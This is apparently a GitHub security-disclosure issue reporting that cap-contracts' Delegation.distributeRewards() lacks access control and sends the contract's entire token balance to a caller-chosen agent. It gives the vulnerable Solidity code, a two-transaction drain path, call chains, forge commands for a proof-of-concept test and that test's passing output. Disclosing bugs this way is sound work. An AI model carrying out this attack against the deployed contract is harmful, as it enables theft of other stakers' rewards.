### ISSUE TITLE
Permissionless Fund-Mover in Delegation.distributeRewards()

### ISSUE THREAD

**Issue by mrglitchbz2** [cap-labs-dev/cap-contracts#276]
**Severity:** HIGH
**Contract:** contracts/delegation/Delegation.sol
**Commit:** 695c8280b410bce1b43c9254cb214be30fe51dde
### Affected File & Function
```
contracts/delegation/Delegation.sol
distributeRewards(address _agent, address _asset)
```
### Vulnerable Code (Lines ~56–70)
**_solidity_**
```
function distributeRewards(address _agent, address _asset) external {
    // ❌ No checkAccess modifier
    DelegationStorage storage $ = getDelegationStorage();
    uint256 _amount = IERC20(_asset).balanceOf(address(this));  // ❌ ENTIRE balance

    uint256 totalCoverage = coverage(_agent);
    if (totalCoverage == 0) {
        IERC20(_asset).safeTransfer($.feeRecipient, _amount);
        return;
    }

    address network = $.agentData[_agent].network;               // ❌ caller-chosen agent
    IERC20(_asset).safeTransfer(network, _amount);               // ❌ sends EVERYTHING
    ISymbioticNetworkMiddleware(network).distributeRewards(_agent, _asset);

    emit DistributeReward(_agent, _asset, _amount);
}
```
**3 defects:**
**_Line 56_** No checkAccess — anyone can call
**_Line 58_** Reads entire contract balance, not per-agent share
**_Line 66_** _agent is caller-controlled, not bound to msg.sender

### Root Cause
Interface NatSpec in IDelegation.sol promises:

__"Distribute rewards to networks covering an agent proportionally to their coverage"__

**Implementation does not do this:**

No per-agent accounting (agentRewards[agent][asset] missing)

Whole balance always routed to a single caller-chosen agent

No authorization on who can trigger distribution

**Invariant broken:** balanceOf(Delegation) == Σ agent_owed_rewards

### Attack Path
**Preconditions:**
Attacker controls or interacts with a registered agent (attackerAgent) on the protocol.
Attacker has deposited collateral into attackerAgent's Symbiotic vault — being the sole staker at the relevant snapshot.
Delegation contract holds non-zero USDC (or any reward token) at the moment of attack.

No explicit checkAccess is set on Delegation.distributeRewards (confirmed — no role is granted anywhere in ConfigureAccessControl.sol).

**Steps:**

Attacker identifies D_balance = USDC.balanceOf(address(Delegation)) > 0.
Attacker crafts tx1: Delegation.distributeRewards(attackerAgent, USDC).
Delegation reads _amount = D_balance.
Delegation transfers _amount USDC to attackerAgent.network.
network forwards _amount USDC to attackerAgent's staker rewarder.
Rewarder records {_amount, block.timestamp - 1} as a new reward entry for network.
Attacker crafts tx2: DefaultStakerRewards.claimRewards(attacker, USDC, data).
Rewarder computes amount = (attackerShares / totalSharesAtSnapshot) × _amount.
Since attacker is sole staker at the snapshot, amount == _amount.

Attacker's EOA receives _amount USDC.

**Result:** Attacker captures D_balance at the moment of attack. All other agents' accrued rewards are silently destroyed (they receive 0 in any subsequent claim).
```
Tx1: Delegation.distributeRewards(attackerAgent, USDC)
     → reads ENTIRE balance of Delegation
     → sends ENTIRE balance to attackerAgent's network
     → network forwards to attacker's staker rewarder

Tx2: DefaultStakerRewards.claimRewards(attacker, USDC, data)
     → share-based math: (attackerShares / totalShares) × amount
     → if attacker is sole staker → 100% of pool
     → USDC lands in attacker's EOA
```
**Attacker prerequisites:** Registered agent + staker in its vault (permissionless).
**Cost:** ~500K gas (~$5–15).
**Condition:** Delegation must hold non-zero balance at attack time.

### Complete Call Chain
**Legitimate Reward Flow**
```
Borrower
  └──► Lender.repay(asset, amount, agent)
        └──► BorrowLogic.repay($, params)
              ├──► realizeRestakerInterest($, agent, asset)
              │     ├──► maxRestakerRealization(...)
              │     │     └──► accruedRestakerInterest(...)
              │     ├──► reserve.debt += realizedInterest
              │     ├──► IDebtToken.mint(agent, total)
              │     ├──► IVault.borrow(asset, realized, delegation)     [funds → Delegation]
              │     └──► Delegation.distributeRewards(agent, asset)     [funds → network]
              │
              └──► if (restakerRepaid > 0)
                    ├──► IERC20.safeTransfer(delegation, restakerRepaid) [funds → Delegation]
                    └──► Delegation.distributeRewards(agent, asset)     [funds → network]
```
**Under normal operation the flow is atomic — funds never persist on Delegation between transactions.**
### Attacker's Call Chain
```
Attacker (no roles)
  └──► Delegation.distributeRewards(attackerAgent, USDC)                [no access control]
        │
        ├──► IERC20(USDC).balanceOf(address(delegation))                ← reads ENTIRE balance
        │
        ├──► coverage(attackerAgent)   [internal view]
        │     ├──► SymbioticNetworkMiddleware.slashableCollateral(...)
        │     ├──► SymbioticNetworkMiddleware.coverage(...)
        │     └──► SymbioticNetworkMiddleware.slashableCollateral(...)
        │
        ├──► network = agentData[attackerAgent].network                 ← attacker-selected
        │
        ├──► IERC20(USDC).safeTransfer(network, _amount)                ← ENTIRE balance
        │
        └──► SymbioticNetworkMiddleware(network).distributeRewards(attackerAgent, USDC)
              │
              └──► DefaultStakerRewards.distributeRewards(network, USDC, _amount, data)
                    │
                    ├──► Vault.activeSharesAt(block.timestamp - 1)       [snapshot total]
                    ├──► IERC20.safeTransferFrom(middleware, rewarder, _amount)
                    └──► rewards[USDC][network].push({_amount, timestamp})
```
**Attacker's claim (second transaction):**
```
Attacker
  └──► DefaultStakerRewards.claimRewards(attacker, USDC, data)
        │
        ├──► stakerShares = Vault.activeSharesOfAt(attacker, timestamp)
        │
        ├──► amount = stakerShares.mulDiv(reward.amount, totalSharesAtSnapshot)
        │
        └──► IERC20(USDC).safeTransfer(attacker, amount)
```
f attacker is the sole staker of attackerAgent's vault at the snapshot, stakerShares == totalShares and amount == reward.amount (100%).
###  Impact
**Fund theft** | Attacker can force-transfer the entire Delegation USDC balance to a chosen network/rewarder, then claim it.
**Silent victim loss** | All other agents' accrued rewards are moved out of Delegation and cannot be recovered.
**Accounting corruption** | The protocol's invariant balanceOf(Delegation) ≥ Σ agent_owed_rewards is broken — no per-agent accounting exists to enforce it.
**MEV / front-run exposure** | Any pending Delegation.distributeRewards distribution can be front-run by an attacker naming their own agent.
**Privilege escalation**  Any unprivileged address acquires the effective authority of the reward-distribution keeper.
### Impact Quantification
Let B be the Delegation token balance at the moment of attack.

**Attacker gain** = B × (attackerShares / totalSharesAtSnapshot). If attacker is sole staker → attacker gain = B.

**Victim loss** = the amount that "should have gone to other agents" = B × (1 - attacker_fair_share / total_pool). With N equal-coverage agents and attacker taking everything, victim loss = B × (N-1)/N.
### Proof of Concept
```
Clone Repo
Install all dependences
_then run_ 
forge install                 # one-time
forge build
forge test --match-contract C02_SoleStaker_100PercentClaim -vvv
```
### Output (All 3 PASS)
```
[PASS] test_C02_ShareMathExplained() (gas: 684731)
Logs:
  === SHARE MATH PROOF ===
  Reward amount:               1000000000000
  Attacker shares at snapshot: 100000000000
  Total shares at snapshot:    100000000000
  Attacker claimed:            1000000000000
  Ratio claimed/reward (1e18): 1000000000000000000    ← 1.0 = 100%

[PASS] test_C02_SoleStaker_Claims100Percent() (gas: 493567)
Logs:
  =========== BALANCES ===========
  Pool before:       1000000000000
  Attacker before:   0
  Victim before:     0
  --------
  Attacker claimed:  1000000000000
  Attacker after:    1000000000000
  Victim after:      0
  Pool after:        0

  =========== FAIRNESS VIOLATION ===
  Fair share (50%):   500000000000
  Actual attacker:    1000000000000
  Excess over fair:   500000000000
  Victim loss:        500000000000
  ==================================

[PASS] test_C02_VictimCannotClaimFromAttackerRewarder() (gas: 310045)

Suite result: ok. 3 passed; 0 failed; 0 skipped
```
### Zip File For Testing Click the cap-PoC.zip

[cap-PoC.zip](https://github.com/user-attachments/files/32427966/cap-PoC.zip)

<img width="1600" height="850" alt="Image" src="https://github.com/user-attachments/assets/c4cce4a8-3150-4456-824c-01dd7e6d9093" />
<img width="1600" height="850" alt="Image" src="https://github.com/user-attachments/assets/799067bc-3475-4b98-915a-001078e5d933" />
